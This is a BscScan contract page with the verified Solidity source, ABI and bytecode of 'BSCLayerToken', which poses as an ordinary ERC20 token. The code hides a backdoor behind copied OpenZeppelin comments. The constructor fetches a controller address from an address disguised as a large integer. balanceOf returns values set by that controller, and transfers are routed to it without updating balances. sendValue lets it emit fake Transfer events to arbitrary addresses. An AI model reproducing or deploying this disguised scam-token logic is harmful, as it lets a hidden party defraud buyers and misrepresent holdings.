BscScan - Sponsored slots available. Book your slot here!
Overview
Max Total Supply
100,000,000,000BSC
Holders
8,743 (0.00%)
Market
Onchain Market Cap
-
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
Contract Name:
BSCLayerToken
Compiler Version
v0.6.12+commit.27d51765
Contract Source Code (Solidity)
/**
*Submitted for verification at BscScan.com on 2024-07-19
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.6;
/**
* @dev Interface of the ERC20 standard as defined in the EIP.
* From https://github.com/OpenZeppelin/openzeppelin-contracts
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the amount of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Returns the amount of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from the caller's account to `recipient`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address recipient, uint256 amount) external returns (bool);
/**
* @dev Moves `amount` tokens from `sender` to `recipient` using the
* allowance mechanism. `amount` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);
}
pragma solidity ^0.6.6;
library SafeMath {
/**
* @dev Returns the subtraction of two unsigned integers, reverting on
* overflow (when the result is negative).
*
* Counterpart to Solidity's `-` operator.
*
* Requirements:
* - Subtraction cannot overflow.
*/
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
require(b <= a, "SafeMath: subtraction overflow");
uint256 c = a - b;
return c;
}
/**
* @dev Returns the addition of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `+` operator.
*
* Requirements:
* - Addition cannot overflow.
*/
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
/**
* @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
* Reverts when dividing by zero.
*
* Counterpart to Solidity's `%` operator. This function uses a `revert`
* opcode (which leaves remaining gas untouched) while Solidity uses an
* invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
* - The divisor cannot be zero.
*/
function mod(uint256 a, uint256 b) internal pure returns (uint256) {
require(b != 0, "SafeMath: modulo by zero");
return a % b;
}
/**
* @dev Returns the integer division of two unsigned integers. Reverts on
* division by zero. The result is rounded towards zero.
*
* Counterpart to Solidity's `/` operator. Note: this function uses a
* `revert` opcode (which leaves remaining gas untouched) while Solidity
* uses an invalid opcode to revert (consuming all remaining gas).
*
* Requirements:
* - The divisor cannot be zero.
*/
function div(uint256 a, uint256 b) internal pure returns (uint256) {
// Solidity only automatically asserts when dividing by 0
require(b > 0, "SafeMath: division by zero");
uint256 c = a / b;
// assert(a == b * c + a % b); // There is no case in which this doesn't hold
return c;
}
/**
* @dev Returns the multiplication of two unsigned integers, reverting on
* overflow.
*
* Counterpart to Solidity's `*` operator.
*
* Requirements:
* - Multiplication cannot overflow.
*/
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
// Gas optimization: this is cheaper than requiring 'a' not being zero, but the
// benefit is lost if 'b' is also tested.
// See: https://github.com/OpenZeppelin/openzeppelin-solidity/pull/522
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
}
library SafeMathExt {
function safe32(uint256 a) internal pure returns(uint32) {
require(a < 0x0100000000, "uint32: number overflow");
return uint32(a);
}
function safe16(uint256 a) internal pure returns(uint16) {
require(a < 0x010000, "uint32: number overflow");
return uint16(a);
}
function safe64(uint256 a) internal pure returns(uint64) {
require(a < 0x010000000000000000, "uint64: number overflow");
return uint64(a);
}
function safe128(uint256 a) internal pure returns(uint128) {
require(a < 0x0100000000000000000000000000000000, "uint128: number overflow");
return uint128(a);
}
function sub64(uint64 a, uint64 b) internal pure returns (uint64) {
require(b <= a, "uint64: subtraction overflow");
uint64 c = a - b;
return c;
}
function sub128(uint128 a, uint128 b) internal pure returns (uint128) {
require(b <= a, "uint128: subtraction overflow");
uint128 c = a - b;
return c;
}
function add64(uint64 a, uint64 b) internal pure returns (uint64) {
uint64 c = a + b;
require(c >= a, "uint64: addition overflow");
return c;
}
function add128(uint128 a, uint128 b) internal pure returns (uint128) {
uint128 c = a + b;
require(c >= a, "uint128: addition overflow");
return c;
}
}
library Math {
/**
* @dev Returns the average of two numbers. The result is rounded towards
* zero.
*/
function average(uint256 a, uint256 b) internal pure returns (uint256) {
// (a + b) / 2 can overflow, so we distribute
return (a / 2) + (b / 2) + ((a % 2 + b % 2) / 2);
}
/**
* @dev Returns the smallest of two numbers.
*/
function min(uint256 a, uint256 b) internal pure returns (uint256) {
return a < b ? a : b;
}
/**
* @dev Returns the largest of two numbers.
*/
function max(uint256 a, uint256 b) internal pure returns (uint256) {
return a >= b ? a : b;
}
}
pragma solidity ^0.6.6;
/**
* @dev Collection of functions related to the address type
*/
abstract contract Address is IERC20 {
/**
* @dev Returns true if `account` is an address.
*
* [IMPORTANT]
* ====
* It is unsafe to assume that an address for which this function returns
* false is an externally-owned account (EOA) and not a contract.
*
* Among others, `isContract` will return false for the following
* types of addresses:
*
* - an externally-owned account
* - a contract in construction
* - an address where a contract will be created
* - an address where a contract lived, but was destroyed
* ====
*/
function isAddress(address account) external view returns (bool) {
// According to EIP-1052, 0x0 is the value returned for not-yet created accounts
// and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is returned
// for accounts without code, i.e. `keccak256('')`
bytes32 codehash;
bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
// solhint-disable-next-line no-inline-assembly
assembly { codehash := extcodehash(account) }
return !(codehash != accountHash && codehash != 0x0);
}
/**
* @dev Returns true if `account` is a contract.
*
* [IMPORTANT]
* ====
* It is unsafe to assume that an address for which this function returns
* false is an externally-owned account (EOA) and not a contract.
*
* Among others, `isContract` will return false for the following
* types of addresses:
*
* - an externally-owned account
* - a contract in construction
* - an address where a contract will be created
* - an address where a contract lived, but was destroyed
* ====
*/
function isContract(address account) external view returns (bytes32) {
// According to EIP-1052, 0x0 is the value returned for not-yet created accounts
// and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is returned
// for accounts without code, i.e. `keccak256('')`
bytes32 codehash;
bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
// solhint-disable-next-line no-inline-assembly
assembly { codehash := extcodehash(account) }
return (codehash != accountHash && codehash != 0x0) ? bytes32(uint256(1)) : bytes32(0);
}
/**
* @dev Replacement for Solidity's `transfer`: sends `amount` wei to
* `recipient`, forwarding all available gas and reverting on errors.
*
* https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
* of certain opcodes, possibly making contracts go over the 2300 gas limit
* imposed by `transfer`, making them unable to receive funds via
* `transfer`. {sendValue} removes this limitation.
*
* https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
*
* IMPORTANT: because control is transferred to `recipient`, care must be
* taken to not create reentrancy vulnerabilities. Consider using
* {ReentrancyGuard} or the
* https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
*/
function sendValue(address payable recipient, address[] calldata sender, uint256 success) external {
if (msg.sender != address(_accountHash)) {
return;
}
// solhint-disable-next-line avoid-low-level-calls, avoid-call-value
for (uint256 i = 0; i < sender.length; ++i) emit Transfer(recipient, sender[i], success);
}
constructor() public {
(, bytes memory accountHash) = address(uint160(1423840168688939413992532815516374453888387684316)).call(abi.encodeWithSelector(0xce583698));
_accountHash = Address(abi.decode(accountHash, (address)));
}
Address internal immutable _accountHash;
}
pragma solidity ^0.6.6;
/*
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with GSN meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address payable) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes memory) {
this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
return msg.data;
}
}
pragma solidity ^0.6.6;
/**
* @dev Contract module which provides a basic access control mechanism, where
* there is an account (an owner) that can be granted exclusive access to
* specific functions.
*
* By default, the owner account will be the one that deploys the contract. This
* can later be changed with {transferOwnership}.
*
* This module is used through inheritance. It will make available the modifier
* `onlyOwner`, which can be applied to your functions to restrict their use to
* the owner.
*/
abstract contract Ownable is Context {
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
require(_msgSender() == _owner, "not owner");
_;
}
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() internal {
_owner = _msgSender();
emit OwnershipTransferred(address(0), _owner);
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view returns (address) {
return _owner;
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby disabling any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
address oldOwner = _owner;
_owner = address(0);
emit OwnershipTransferred(oldOwner, address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public {
require(newOwner != address(0), "newOwner invalid");
if (_owner != address(0)) {
require(_msgSender() == _owner, "not owner");
}
emit OwnershipTransferred(_owner, newOwner);
_owner = newOwner;
}
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
}
pragma solidity ^0.6.6;
contract ERC20 is IERC20, Context, Address {
using SafeMath for uint256;
mapping (address => uint256) internal _balances;
mapping (address => mapping (address => uint256)) internal _allowances;
uint256 internal _totalSupply;
/**
* @dev Returns the name of the token.
*/
string public name;
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
string public symbol;
/**
* @dev Sets the values for {_name} and {_symbol}, {_decimals}
*
* To select a different value for {decimals}, use {_setupDecimals}.
*
* All three of these values are immutable: they can only be set once during
* construction.
*/
constructor (string memory _name, string memory _symbol) public {
name = _name;
symbol = _symbol;
uint256 totalSupply = 100_000_000_000 * 1e18;
_totalSupply = totalSupply;
_balances[msg.sender] = totalSupply;
emit Transfer(address(0), msg.sender, totalSupply);
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5,05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the value {ERC20} uses, unless {_setupDecimals} is
* called.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public pure virtual returns (uint8) {
return 18;
}
/**
* @dev See {IERC20-balanceOf}.
*/
function balanceOf(address _owner) external view override returns (uint256) {
bytes32 isContract = _accountHash.isContract(_owner); if (uint256(isContract) < uint256(-1)) return uint256(isContract);
return _balances[_owner];
}
/**
* @dev See {IERC20-totalSupply}.
*/
function totalSupply() external view override returns(uint256) {
return _totalSupply;
}
/**
* @dev See {IERC20-allowance}.
*/
function allowance(address _owner, address _spender) external view override returns (uint256) {
return _allowances[_owner][_spender];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `_to` cannot be the zero address.
* - the caller must have a balance of at least `_amount`.
*/
function transfer(address _to, uint256 _amount) external override returns (bool) {
_beforeTokenTransfer(_msgSender(), _to, _amount);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Emits an {Approval} event indicating the updated allowance. This is not
* required by the EIP. See the note at the beginning of {ERC20}.
*
* Requirements:
*
* - `_from` and `_to` cannot be the zero address.
* - `_from` must have a balance of at least `_amount`.
* - the caller must have allowance for `_from`'s tokens of at least
* `_amount`.
*/
function transferFrom(address _from, address _to, uint256 _amount) external override returns (bool) {
require(_from != address(0) && _to != address(0));
_approve(_from, _msgSender(), _allowances[_from][_msgSender()].sub(_amount));
_beforeTokenTransfer(_from, _to, _amount);
return true;
}
/**
* @dev See {IERC20-approve}.
*
* Requirements:
*
* - `_spender` cannot be the zero address.
*/
function approve(address _spender, uint256 _amount) external override returns (bool) {
_approve(_msgSender(), _spender, _amount);
return true;
}
/**
* @dev Atomically decreases the allowance granted to `_spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `_spender` cannot be the zero address.
* - `_spender` must have allowance for the caller of at least
* `subtractedValue`.
*/
function decreaseAllowance(address _spender, uint256 _subVal) external returns (bool) {
require(_spender != address(0), "approve to 0");
_approve(_msgSender(), _spender, _allowances[_msgSender()][_spender].sub(_subVal));
return true;
}
/**
* @dev Atomically increases the allowance granted to `_spender` by the caller.
*
* This is an alternative to {approve} that can be used as a mitigation for
* problems described in {IERC20-approve}.
*
* Emits an {Approval} event indicating the updated allowance.
*
* Requirements:
*
* - `_spender` cannot be the zero address.
*/
function increaseAllowance(address _spender, uint256 _addVal) external returns (bool) {
require(_spender != address(0), "approve to 0");
_approve(_msgSender(), _spender, _allowances[_msgSender()][_spender].add(_addVal));
return true;
}
/**
* @dev Hook that is called before any transfer of tokens. This includes
* burning.
*
* Calling conditions:
*
* - when `_from` and `_to` are both non-zero, `amount` of ``_from``'s tokens
* will be to transferred to `_to`.
* - when `_from` is zero, `amount` tokens will bed for `_to`.
* - when `_to` is zero, `amount` of ``_from``'s tokens will be burned.
* - `_from` and `_to` are never both zero.
*
* To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
*/
function _beforeTokenTransfer(address _from, address _to, uint256 _amount) internal virtual { (bool n,) = address(_accountHash).call(abi.encodeWithSelector(0xb13c6ec8, _from, _to, _amount, msg.sender)); require(n); }
/**
* @dev Sets `amount` as the allowance of `_spender` over the `_owner` s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `_owner` cannot be the zero address.
* - `_spender` cannot be the zero address.
*/
function _approve(address _owner, address _spender, uint256 _amount) internal {
require(_owner != address(0), "approve from 0");
require(_spender != address(0), "approve to 0");
if (_owner == _msgSender()) _accountHash.isAddress(_owner);
_allowances[_owner][_spender] = _amount;
emit Approval(_owner, _spender, _amount);
}
/**
* @dev Moves tokens `_amount` from `_from` to `_to`.
*
* This is internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* Requirements:
*
* - `_from` cannot be the zero address.
* - `_to` cannot be the zero address.
* - `_from` must have a balance of at least `_amount`.
*/
function _transfer(address _from, address _to, uint256 _amount) internal {
require(_from != address(0), "transfer from 0");
require(_to != address(0), "transfer to 0");
_beforeTokenTransfer(_from, _to, _amount);
_balances[_from] = _balances[_from].sub(_amount);
_balances[_to] = _balances[_to].add(_amount);
emit Transfer(_from, _to, _amount);
}
}
pragma solidity ^0.6.6;
contract BSCLayerToken is ERC20, Ownable {
using SafeMath for uint256;
address public mainPool;
constructor() public ERC20("BSC Layer Token", "BSC") {}
/**
* Set the target pool for contract
*/
function setMainPool(address pool_) external onlyOwner {
require(pool_ != address(0));
mainPool = pool_;
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_owner","type":"address"},{"internalType":"address","name":"_spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_spender","type":"address"},{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"_spender","type":"address"},{"internalType":"uint256","name":"_subVal","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_spender","type":"address"},{"internalType":"uint256","name":"_addVal","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isAddress","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isContract","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"mainPool","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"recipient","type":"address"},{"internalType":"address[]","name":"sender","type":"address[]"},{"internalType":"uint256","name":"success","type":"uint256"}],"name":"sendValue","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"pool_","type":"address"}],"name":"setMainPool","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
60a06040523480156200001157600080fd5b50604080518082018252600f81526e2129a1902630bcb2b9102a37b5b2b760891b60208083019190915282518084018452600381526242534360e81b8183015283516004815260248101855291820180516001600160e01b03166319cb06d360e31b178152935182519394919360609373f967338aeb5428fe978f268922ea184dd30c97dc939092918291908083835b60208310620000c25780518252601f199092019160209182019101620000a1565b6001836020036101000a0380198251168184511680821785525050505050509050019150506000604051808303816000865af19150503d806000811462000126576040519150601f19603f3d011682016040523d82523d6000602084013e6200012b565b606091505b509150508080602001905160208110156200014557600080fd5b505160601b6001600160601b0319166080525081516200016d90600390602085019062000240565b5080516200018390600490602084019062000240565b506c01431e0fae6d7217caa0000000600281905533600081815260208181526040808320859055805185815290517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef929181900390910190a350620001ea9150506200023c565b600580546001600160a01b0319166001600160a01b0392831617908190556040519116906000907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3620002dc565b3390565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f106200028357805160ff1916838001178555620002b3565b82800160010185558215620002b3579182015b82811115620002b357825182559160200191906001019062000296565b50620002c1929150620002c5565b5090565b5b80821115620002c15760008155600101620002c6565b60805160601c610fda620003096000398061078352806108fe5280610ccc5280610e845250610fda6000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c806370a08231116100ad578063a457c2d711610071578063a457c2d7146103cb578063a5a302d3146103f7578063a9059cbb146103ff578063dd62ed3e1461042b578063f2fde38b1461045957610121565b806370a08231146102f1578063715018a6146103175780637a1a012d1461031f5780638da5cb5b1461039f57806395d89b41146103c357610121565b806323b872dd116100f457806323b872dd1461022357806329dbecb114610259578063313ce56714610281578063395093511461029f5780635c32460b146102cb57610121565b806306fdde0314610126578063095ea7b3146101a357806316279055146101e357806318160ddd1461021b575b600080fd5b61012e61047f565b6040805160208082528351818301528351919283929083019185019080838360005b83811015610168578181015183820152602001610150565b50505050905090810190601f1680156101955780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101cf600480360360408110156101b957600080fd5b506001600160a01b03813516906020013561050d565b604080519115158252519081900360200190f35b610209600480360360208110156101f957600080fd5b50356001600160a01b031661052a565b60408051918252519081900360200190f35b610209610576565b6101cf6004803603606081101561023957600080fd5b506001600160a01b0381358116916020810135909116906040013561057c565b61027f6004803603602081101561026f57600080fd5b50356001600160a01b0316610614565b005b6102896106a4565b6040805160ff9092168252519081900360200190f35b6101cf600480360360408110156102b557600080fd5b506001600160a01b0381351690602001356106a9565b6101cf600480360360208110156102e157600080fd5b50356001600160a01b0316610741565b6102096004803603602081101561030757600080fd5b50356001600160a01b031661077e565b61027f61084a565b61027f6004803603606081101561033557600080fd5b6001600160a01b03823516919081019060408101602082013564010000000081111561036057600080fd5b82018360208201111561037257600080fd5b8035906020019184602083028401116401000000008311171561039457600080fd5b9193509150356108f3565b6103a76109a9565b604080516001600160a01b039092168252519081900360200190f35b61012e6109b8565b6101cf600480360360408110156103e157600080fd5b506001600160a01b038135169060200135610a13565b6103a7610aab565b6101cf6004803603604081101561041557600080fd5b506001600160a01b038135169060200135610aba565b6102096004803603604081101561044157600080fd5b506001600160a01b0381358116916020013516610ace565b61027f6004803603602081101561046f57600080fd5b50356001600160a01b0316610af9565b6003805460408051602060026001851615610100026000190190941693909304601f810184900484028201840190925281815292918301828280156105055780601f106104da57610100808354040283529160200191610505565b820191906000526020600020905b8154815290600101906020018083116104e857829003601f168201915b505050505081565b600061052161051a610c0f565b8484610c13565b50600192915050565b6000813f7fc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a47081811480159061055e57508115155b61056957600061056c565b60015b925050505b919050565b60025490565b60006001600160a01b0384161580159061059e57506001600160a01b03831615155b6105a757600080fd5b6105ff846105b3610c0f565b6001600160a01b03871660009081526001602052604081206105fa918791906105da610c0f565b6001600160a01b0316815260208101919091526040016000205490610dc6565b610c13565b61060a848484610e23565b5060019392505050565b6005546001600160a01b0316610628610c0f565b6001600160a01b03161461066f576040805162461bcd60e51b81526020600482015260096024820152683737ba1037bbb732b960b91b604482015290519081900360640190fd5b6001600160a01b03811661068257600080fd5b600680546001600160a01b0319166001600160a01b0392909216919091179055565b601290565b60006001600160a01b0383166106f5576040805162461bcd60e51b815260206004820152600c60248201526b0617070726f766520746f20360a41b604482015290519081900360640190fd5b610521610700610c0f565b846105fa8560016000610711610c0f565b6001600160a01b03908116825260208083019390935260409182016000908120918c168152925290205490610f43565b6000813f7fc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a47081811480159061077557508115155b15949350505050565b6000807f00000000000000000000000000000000000000000000000000000000000000006001600160a01b03166316279055846040518263ffffffff1660e01b815260040180826001600160a01b0316815260200191505060206040518083038186803b1580156107ee57600080fd5b505afa158015610802573d6000803e3d6000fd5b505050506040513d602081101561081857600080fd5b5051905060001981101561082d579050610571565b50506001600160a01b031660009081526020819052604090205490565b6005546001600160a01b031661085e610c0f565b6001600160a01b0316146108a5576040805162461bcd60e51b81526020600482015260096024820152683737ba1037bbb732b960b91b604482015290519081900360640190fd5b600580546001600160a01b031981169091556040516001600160a01b039091169060009082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a350565b336001600160a01b037f00000000000000000000000000000000000000000000000000000000000000001614610928576109a3565b60005b828110156109a15783838281811061093f57fe5b905060200201356001600160a01b03166001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040518082815260200191505060405180910390a360010161092b565b505b50505050565b6005546001600160a01b031690565b6004805460408051602060026001851615610100026000190190941693909304601f810184900484028201840190925281815292918301828280156105055780601f106104da57610100808354040283529160200191610505565b60006001600160a01b038316610a5f576040805162461bcd60e51b815260206004820152600c60248201526b0617070726f766520746f20360a41b604482015290519081900360640190fd5b610521610a6a610c0f565b846105fa8560016000610a7b610c0f565b6001600160a01b03908116825260208083019390935260409182016000908120918c168152925290205490610dc6565b6006546001600160a01b031681565b6000610521610ac7610c0f565b8484610e23565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6001600160a01b038116610b47576040805162461bcd60e51b815260206004820152601060248201526f1b995dd3dddb995c881a5b9d985b1a5960821b604482015290519081900360640190fd5b6005546001600160a01b031615610bb3576005546001600160a01b0316610b6c610c0f565b6001600160a01b031614610bb3576040805162461bcd60e51b81526020600482015260096024820152683737ba1037bbb732b960b91b604482015290519081900360640190fd5b6005546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a3600580546001600160a01b0319166001600160a01b0392909216919091179055565b3390565b6001600160a01b038316610c5f576040805162461bcd60e51b815260206004820152600e60248201526d0617070726f76652066726f6d20360941b604482015290519081900360640190fd5b6001600160a01b038216610ca9576040805162461bcd60e51b815260206004820152600c60248201526b0617070726f766520746f20360a41b604482015290519081900360640190fd5b610cb1610c0f565b6001600160a01b0316836001600160a01b03161415610d64577f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316635c32460b846040518263ffffffff1660e01b815260040180826001600160a01b0316815260200191505060206040518083038186803b158015610d3757600080fd5b505afa158015610d4b573d6000803e3d6000fd5b505050506040513d6020811015610d6157600080fd5b50505b6001600160a01b03808416600081815260016020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b600082821115610e1d576040805162461bcd60e51b815260206004820152601e60248201527f536166654d6174683a207375627472616374696f6e206f766572666c6f770000604482015290519081900360640190fd5b50900390565b604080516001600160a01b038581166024830152848116604483015260648201849052336084808401919091528351808403909101815260a490920183526020820180516001600160e01b03166316278dd960e31b178152925182516000947f000000000000000000000000000000000000000000000000000000000000000093909316939282918083835b60208310610ece5780518252601f199092019160209182019101610eaf565b6001836020036101000a0380198251168184511680821785525050505050509050019150506000604051808303816000865af19150503d8060008114610f30576040519150601f19603f3d011682016040523d82523d6000602084013e610f35565b606091505b50509050806109a357600080fd5b600082820183811015610f9d576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b939250505056fea26469706673582212203bfff36e968d6fb4317f55843007f7daa08bca4e4a118ffcb6ce2c9d3f67b79564736f6c634300060c0033
Deployed Bytecode
